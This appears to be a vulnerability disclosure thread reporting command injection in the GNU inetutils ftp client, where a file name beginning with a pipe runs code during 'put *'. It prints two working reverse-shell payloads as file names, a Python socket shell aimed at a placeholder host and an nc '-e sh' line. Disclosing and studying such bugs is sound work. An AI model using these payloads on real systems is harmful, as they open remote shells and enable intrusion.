Re: FTP client arbitrary code execution

[John Zhau]

After some further testing, I've found that I'm still able to get a shell with the aforementioned payload even with other files in the same directory. I've also found that I can also get a shell with the following file name:

```

|nc 127.0.0.1 1337 -e sh

```

As a result, I believe code execution is caused by having a `|` (pipe) at the beginning of the file name.

Also, the version information is as follows.

```

$ ftp --version
ftp (GNU inetutils) 2.1
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

```

On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xnull@gmail.com> wrote:

I've found that with a certain file name, `ftp` executes code in the file name. The file is created with the following command

```

touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

```

To get code to execute, simply have the file in the current directory (haven't tested with multiple files in the directory) and run `put *` to upload everything.

This bug was found while I was doing a CTF (capture the flag) challenge and I haven't been able to connect to the same server since for further testing.